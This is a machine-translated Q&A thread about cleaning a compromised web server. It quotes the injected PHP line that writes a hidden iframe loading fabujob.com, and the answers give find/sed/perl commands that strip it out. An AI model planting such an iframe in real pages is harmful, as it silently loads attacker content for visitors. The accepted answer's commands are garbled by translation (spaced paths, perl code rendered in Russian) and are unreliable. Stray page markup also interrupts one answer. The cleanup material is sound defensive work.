Найдите index.php и index.html и замените строку

Question

Найдите index.php и index.html и замените строку

Недавно на моем компьютере было какое-то вредоносное ПО, которое добавлялось ко всем файлам index.php и index.html на веб-сервере! следующая строка (и):

echo "<iframe src=\"http://fabujob.com/?click=AD4A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://fabujob.com/?click=AC785\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Поэтому параметр после "click=" всегда изменяется. Эти два были только примерами.

Есть ли способ сделать это быстро и быстро?

,

РЕДАКТИРОВАТЬ: Это на моем веб-сервере, так что нет смысла находить...

0

ftp replace

Источник

Jonas 18 июл '09 в 00:17

5 ответов

Решение

Пытаться regexxer или же rpl Тип инструментов. Вся их цель - замена всего проекта. Они поддерживают рекурсивные каталоги и позволяют выбирать типы файлов, к которым следует применить замену.

0

Источник

Saurabh Barjatiya 18 июл '09 в 03:31

Предполагая, что домен всегда один и тот же и нигде не должен законно существовать:

find <documentroot> -name 'index.html' -or -name 'index.php' \
    -exec sed -i'.bak' '/fabujob\.com/d' {} \;

Оригиналы будут сохранены с расширением.bak". Вы можете просто использовать -i если вы не хотите резервных копий.

0

Источник

Dan Carley 18 июл '09 в 09:44

sed и find должны помочь вам, но sed потребуется некоторое время, чтобы научиться (достаточно, чтобы я не мог придумать возможную команду из моей головы прямо сейчас).

Кроме того, существуют графические редакторы, которые способны находить и заменять все дерево каталогов (например, Textmate на Mac). Затем вы бы использовали регулярное выражение для покрытия переменной части.

0

Источник

Sven 18 июл '09 в 00:28

Если вы знаете, что в ваших документах нет тегов , вы можете просто</p><pre><code>perl -i -n -e'print unless /<iframe>/' $(find . -name index.html) </code></pre><p>Если у вас есть фреймы iframe, вам нужно будет сделать свое регулярное выражение более точным.</p><p>Флаг Perl -i слишком часто игнорируется. Это означает "редактировать на месте". См. <a href="http://petdance.com/perl/command-line-options.pdf" rel="noopener nofollow noreferrer" target="_blank">http://petdance.com/perl/command-line-options.pdf</a> чтобы узнать больше примеров магии, которая будет выполняться в Perl из командной строки.</p> </div> <div class="a-info"> <div class="row"> <div class="col-sm-2"> <a class="like-button" title="Чтобы оценить ответ необходимо войти под своим логином." > <div class="btn btn-my btn-block" style="background: #bdc3c7 "> <span itemprop="upvoteCount">0</span> <i class="far fa-thumbs-up"></i> </div> </a> </div> </div> <div class="row"> <div class="col-sm-4"> <a class="a-source" href="https://serverfault.com/questions/42393/search-for-indexphp-and-indexhtml-and-replace-string/138129#138129" target="_blank">Источник</a> <a class="a-share" href="https://faultserver.ru/questions/33873/najdite-indexphp-i-indexhtml-i-zamenite-stroku/33879#33879" itemprop="url">Поделиться</a> </div> <div class="col-sm-8 text-right author" itemprop="author" itemscope="" itemtype="http://schema.org/Person"> <span itemprop="name"> <a href="https://serverfault.com/users/29210/andy-lester" class="q-user" rel="noopener" target="_blank">Andy Lester</a> </span> <span class="q-date" title="2010-05-03 18:46"> 03 май '10 в 18:46</span> <span class="hidden" itemprop="dateCreated" datetime="2010-05-03 18:46">2010-05-03 18:46</span> </div> </div> </div> <span class="hidden" itemprop="dateCreated" datetime="2010-05-03 18:46">2010-05-03 18:46</span> </div> </div> <div class="text-center"> </div> <div class="text-center"> </div> <div class="another-questions"> <div class="row"> <div class="col-md-12 q-tags"> <b>Другие вопросы по тегам</b> <a href="/questions/tagged/ftp" class="tag-block-link" rel="tag" title="показать вопросы с тегом 'ftp'">ftp</a> <a href="/questions/tagged/replace" class="tag-block-link" rel="tag" title="показать вопросы с тегом 'replace'">replace</a> </div> </div> </div> </div> </div> <div class="col-lg-3 AD"> <div id="allFlyout3-0" style="position: sticky; top: 0;"> </div> </div> </div> </div> </section> </main> <div class="padding"></div> </div> <footer> <div class="container"> <div class="row"> <div class="col-sm-6"> <a href="/"> <img src="/static/img/logo.png" alt="faultserver.ru - Поиск вопросов и ответов по системному администрированию" /> </a> </div> <div class="col-sm-6 text-right"> <span class="pull-right"><a href="mailto:info@faultserver.ru">info@faultserver.ru</a></span> <br /> <span class="license pull-left">licensed under <a href="https://creativecommons.org/licenses/by-sa/3.0/" rel="nofollow license" target="_blank">cc by-sa 3.0</a> with attribution</span> </div> </div> </div> </footer>  <script type="text/javascript" > (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54350467, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); </script> <noscript><div><img src="https://mc.yandex.ru/watch/54350467" style="position:absolute; left:-9999px;" alt="" /></div></noscript>   <script async src="https://www.googletagmanager.com/gtag/js?id=UA-143343359-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-143343359-1'); </script> </body> </html>

cas 18 июл '09 в 01:40 2009-07-18 01:40 · Accepted Answer · 2009-07-18 01:40

Один из простых способов сделать это - использовать find и grep, а также perl для редактирования.

Во-первых, создайте список имен файлов, которые были скомпрометированы:

find / path / to / web / site -name 'index.htm *' -o -name 'index.php' -print0 | \
  xargs -0 grep -l 'iframe src. * fabujob \.com'> /tmp/compromised-files.txt

Далее, используйте Perl для редактирования файлов и удаления эксплойта:

cat /tmp/compromised-files.txt | \
  xargs -d '\ n' perl -n -i.BAK -e 'напечатать, если не указано m / fabujob \.com / i'

(да, для педантиков UUOC это бесполезное использование кошки, но это облегчает чтение и понимание примера)

это удалит каждую строку, содержащую строку "fabujob.com" из каждого скомпрометированного файла. Он также будет сохранять резервную копию каждого файла как filename.BAK, чтобы вы могли легко восстановить их, если что-то пойдет не так. Вы должны удалить их, когда они вам больше не нужны.

Этот сценарий Perl основан на приведенном вами примере, который, по-видимому, указывает на то, что атака добавила целую строку, содержащую эксплойт, поэтому этот скрипт печатает каждую строку, КРОМЕ тех, которые связываются с URL эксплойта. если это не совсем так, то вам придется придумать более подходящий сценарий:)

это общая методика, которую вы можете использовать для внесения любых автоматических изменений в пакет файлов. Вы можете использовать любой код Perl для выполнения этой работы, и Perl обладает огромным набором возможностей манипулирования текстом.

Кстати, при выполнении такой работы ВСЕГДА делайте копию всего дерева каталогов и работайте над этим в первую очередь. таким образом, не имеет значения, если вы испортите скрипт редактирования Perl... просто восстановите исходный файл поверх рабочего каталога. как только вы получите скрипт правильно, вы можете запустить его на реальных файлах.